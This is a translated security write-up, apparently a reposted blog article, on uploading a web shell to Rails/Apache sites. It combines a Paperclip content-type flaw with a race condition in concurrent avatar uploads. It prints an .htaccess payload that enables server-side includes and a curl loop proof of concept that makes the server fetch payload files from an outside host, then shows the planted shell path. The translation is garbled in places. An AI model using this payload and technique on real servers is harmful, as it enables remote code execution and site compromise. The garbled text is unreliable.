Interesting Security experiment: using multi-thread Resource Competition technology to upload shell

Interesting Security experiment: using multi-thread Resource Competition technology to upload shell

By competing with multi-threaded resources, you can upload two portraits at the same time to implement remote code execution in the Apache + Rails environment. This is not a fantasy, and I believe many File Upload systems will have this vulnerability ...... This is a very interesting Security experiment. Let's take a look!

FreeBuf tips:

Rails: an efficient WEB framework based on Ruby.

Paperclip: Rails Image Upload plug-in produced by Thoughtbot.

. Htaccess: a configuration file in the Apache server ,. htaccess can help us achieve the following: folder password protection, automatic user redirection, custom error pages, users who change your file extension, ban specific IP addresses, users who only allow specific IP addresses, and list of prohibited directories, and use other files as index files.

Lab background

Ten months ago, I wrote xss.html "data-ke-src =" http://homakov.blogspot.com/2014/02/paperclip-vulnerability-leading-to-xss.html "target =" _ blank "se_prerender_url =" loading "> A Paperclip Vulnerability Report (with version no higher than 3.5.3 ), this vulnerability is simple but powerful. We can use arbitrary extensions to upload files by forging the Content-Type header.

But Paperclip officially thinks this is a small question-they only regard this vulnerability as a Cross-Site Scripting Vulnerability (XSS ). Okay, a little question! But according to my research, it is actually a high-risk Code Execution Vulnerability!

Here I want to talk about the interesting attack instance implemented in the Apache + Rails environment.

Use. htaccess as shell

According to the features of the Rails framework,. php or. pl files are not executed by default. However, you should know that by default, the. htaccess file under the website directory can overwrite Apache's global settings, especially in Apache 2.3.8 or earlier versions, the server will followAllowOverride All .

Initially I tried to create a self-contained. htaccess shell, but it never worked. Apache does not apply the SSI processor to The. htaccess file, but to the. htaccess with a specific name (1. htaccess in the following article ):

<Files ~ "^\.ht"> Require all granted   # Order allow,deny   # Allow from all</Files>Options +IncludesAddType text/html .htaccessAddOutputFilter INCLUDES .htaccessAddType text/html .shtmlAddOutputFilter INCLUDES .shtml#<!--#printenv -->

 

This configuration means that we need to prepare two files (used to forge profile picture files):. htaccess and 1. htaccess, and they must be "concurrently uploaded ".

 

What, are you saying this is impossible? You are welcome to understand the Concurrency Technology. Principle Analysis

During the experiment, I found that each file upload system has been individually authenticated. For example, when a registered user uploads an avatar, the user will be authenticated. After the upload is complete, the existing avatar will be deleted. However, most of these systems do not strictly review this, making it possible to upload multiple portraits at the same time.

In this case, we assume that the header is 0.jpg, and the file name in the five requests sent at the same time is 1.jpg-5.jpg.

The system will upload these image files to the "/uploads/user/%id.pdf" directory, and then delete the headers 0.jpg. Of course, 0.jpg replacement files may be any of them, because the chance of processing a request for replacement operation at the same time is not fixed, only the final request will take effect in the database.

1.jpg-5.jpgis present at the same time in the folder where the user's header is stored. The four image files that have not become the avatar are not deleted by the program. If this vulnerability is cleverly exploited, it can fill up the space of the website Server :)

Concurrent upload to obtain shell

1. Prepare a URL for payload with. htaccess, or simply use my: http://sakurity.com/.htaccess#http://sakurity.com/num.htaccess 2. Use a handy tool to prepare several request packages for simultaneous Avatar upload. If you prefer curl, five. htaccess files will be uploaded by using the following code (you can change the upper limit if necessary ).

The POC code is as follows:

for i in {1..5};docurl 'http://lh:9292/users' -H <HEADERS> --data 'utf8=%E2%9C%93&_method=put&authenticity_token=TOKEN%3D&user%5Bavatar%5D=http%3A%2F%2Fsakurity.com%2F'"$i"'.htaccess' &curl 'http://lh:9292/users' -H <HEADERS> --data 'utf8=%E2%9C%93&_method=put&authenticity_token=TOKEN%3D&user%5Bavatar%5D=http%3A%2F%2Fsakurity.com%2F.htaccess' &done

The uploaded directory may become the following. In addition, not all requests will succeed. I only created eight tasks (puma-w 8) here ).

Here, we can see that the shell already exists:

http://lh:9292/system/users/avatars/000/000/001/original/1.htaccess